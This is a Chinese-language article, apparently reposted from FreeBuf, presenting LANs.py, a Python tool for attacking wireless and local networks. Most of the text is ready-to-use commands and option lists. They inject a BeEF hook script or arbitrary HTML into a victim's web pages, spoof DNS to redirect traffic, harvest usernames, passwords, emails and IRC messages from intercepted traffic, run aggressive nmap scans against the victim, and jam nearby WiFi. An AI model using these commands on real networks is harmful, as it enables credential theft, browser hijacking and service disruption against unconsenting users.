LANs.py:一款可以實(shí)現(xiàn)代碼注入,無(wú)線滲透和WiFi用戶監(jiān)控的強(qiáng)大工具
LANs.py功能簡(jiǎn)介
1. 自動(dòng)尋找當(dāng)前網(wǎng)絡(luò)中最為活躍的WLAN用戶,并對(duì)其中的一名用戶實(shí)施監(jiān)控,然后向該用戶所訪問(wèn)的Web頁(yè)面注入任意HTML或JavaScript代碼;
2. 干擾附近的WiFi網(wǎng)絡(luò),干擾范圍取決于無(wú)線網(wǎng)卡的性能。我們可以通過(guò)修改配置來(lái)實(shí)現(xiàn)干擾所有人的WiFi信號(hào)或僅干擾某一特定用戶的WiFi信號(hào)。但是LANs.py不支持對(duì)用戶同時(shí)進(jìn)行WiFi干擾和監(jiān)聽(tīng)。
依賴組件
Linux、python-scapy、python-nfqueue(nfqueue-bindings 0.4-3)、aircrack-ng、python-twisted、BeEF (optional)、nmap、nbtscan、tcpdump。(如果你不知道目標(biāo)用戶的IP地址,那么你還需要一塊支持混雜模式的無(wú)線網(wǎng)卡)
測(cè)試環(huán)境為Kali Linux,發(fā)動(dòng)攻擊的設(shè)備地址為192.168.0.5,目標(biāo)設(shè)備的IP地址為192.168.0.10。
所有的可選操作項(xiàng):
Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS][-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-a][-set] [-p] [-na] [-n] [-i INTERFACE] [-r REDIRECTTO][-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP][-s SKIP] [-ch CHANNEL] [-m MAXIMUM] [-no] [-tTIMEINTERVAL] [--packets PACKETS] [--directedonly] [--accesspointACCESSPOINT]
工具使用
目前該工具支持從以下協(xié)議收集數(shù)據(jù):HTTP、FTP、IMAP、POP3和IRC。LANs.py將會(huì)打印出URL地址所返回的資源中前135個(gè)字符,并自動(dòng)忽略結(jié)尾是.jpg、.jpeg、.gif、.css、.ico、.js、.svg和.woff的URL地址。除此之外,它還能夠輸出任意協(xié)議下傳輸?shù)挠脩裘?密碼、以及接收或發(fā)送的電子郵件和IRC消息。
常用命令:
python LANs.py -u -p
其他常用命令:
python LANs.py -u -p -d -ip 192.168.0.10
-d:查看所有的圖片
-ip:設(shè)置目標(biāo)IP地址
HTML注入:
python LANs.py -bhttp://192.168.0.5:3000/hook.js
向目標(biāo)用戶所訪問(wèn)的頁(yè)面中注入一個(gè)BeEF鉤子( http://beefproject.com/ ,【 參考教程 】),注入的參數(shù)會(huì)包裹在<script>標(biāo)簽中,所以你可以在一個(gè)JavaScript文件中的任意位置輸入內(nèi)容。
python LANs.py -c'<title>Owned.</title>'
向目標(biāo)用戶所訪問(wèn)的頁(yè)面中注入任意HTML代碼。工具首先會(huì)嘗試在第一個(gè)<head>標(biāo)簽之后注入內(nèi)容,如果失敗則嘗試在第一個(gè)</head>標(biāo)簽之前注入內(nèi)容。上面給出的示例代碼會(huì)將頁(yè)面標(biāo)題(title)修改為’Owned.’。
讀取pcap文件:
python LANs.py -pcap libpcapfilename -ip192.168.0.10
為了成功讀取pcap文件中的內(nèi)容,你需要使用-ip參數(shù)指定目標(biāo)IP。該功能的一個(gè)優(yōu)點(diǎn)就是用戶無(wú)需使用root權(quán)限便可執(zhí)行該腳本。
DNS欺騙:
python LANs.py -a -r 80.87.128.67
-a選項(xiàng)將會(huì)對(duì)目標(biāo)發(fā)出的每一次DNS請(qǐng)求進(jìn)行欺騙攻擊,并將用戶請(qǐng)求重定向至-r參數(shù)所制定的地址。無(wú)論用戶在地址欄中輸入的是什么地址,他們都將會(huì)被重定向到stallman.org(80.87.128.67)。
python LANs.py -dns eff.org
該命令將會(huì)對(duì)域名eff.org及其子域名進(jìn)行DNS欺騙。
其他使用:
python LANs.py -v -d -p -n -na -set -a -r80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js-ip 192.168.0.10
干擾所有的WiFi網(wǎng)絡(luò):
python LANs.py --jam
僅干擾指定接入點(diǎn):
python Lans.py --jam --accesspoint01:MA:C0:AD:DY
所有的可用選項(xiàng)
常規(guī)使用:
-b BEEF_HOOK_URL:將BeEF hookURL注入到目標(biāo)用戶所訪問(wèn)的每一個(gè)頁(yè)面中,例如-b http://192.168.1.10:3000/hook.js 。
-c ‘HTML CODE’:向目標(biāo)用戶訪問(wèn)的頁(yè)面中注入任意HTML代碼。
-d:查看目標(biāo)用戶訪問(wèn)的圖片。
-dns DOMAIN:對(duì)指定DNS域名進(jìn)行DNS欺騙攻擊,例如-dnsfacebook.com。
-a:對(duì)用戶的所有DNS請(qǐng)求進(jìn)行DNS欺騙攻擊。
-r IPADDRESS: 僅用于-dnsDOMAIN選項(xiàng)。
-u:打印出目標(biāo)用戶所使用的URL地址。
-i INTERFACE: 指定接口,例如-i wlan0。
-ip:指定目標(biāo)IP地址。
-n: 對(duì)目標(biāo)執(zhí)行nmap掃描。
-na:在后臺(tái)對(duì)目標(biāo)執(zhí)行更具攻擊性的nmap掃描,并將掃描結(jié)果輸出到[victim IP address].nmap.txt。
-p:打印出FTP/IMAP/POP/IRC/HTTP協(xié)議下傳輸?shù)挠脩裘?密碼、以及接收或發(fā)送的電子郵件和IRC消息。
-pcap PCAP_FILE: 解析pcap文件中所有的數(shù)據(jù)包; 需要輸入-ip[target's IP address]參數(shù)。
-rmac ROUTER_MAC:指定路由器的MAC地址。
-rip ROUTER_IP:指定路由器的IP地址。
–jam:對(duì)2.4GHz無(wú)線接入點(diǎn)以及客戶端進(jìn)行干擾攻擊。
WiFi干擾:
-sMAC_Address_to_skip:指定需跳過(guò)的MAC地址。
-m MAXIMUM: 指定攻擊客戶端的最大數(shù)量。
-t TIME_INTERVAL: 設(shè)置攻擊間隔。
–packets NUMBER:指定每一次攻擊中發(fā)送的數(shù)據(jù)包數(shù)量。
–accesspoint ROUTER_MAC:輸入目標(biāo)AP的MAC地址。
* 參考來(lái)源: DanMcInerney , FB小編Alpha_h4ck編譯,轉(zhuǎn)載請(qǐng)注明來(lái)自FreeBuf.COM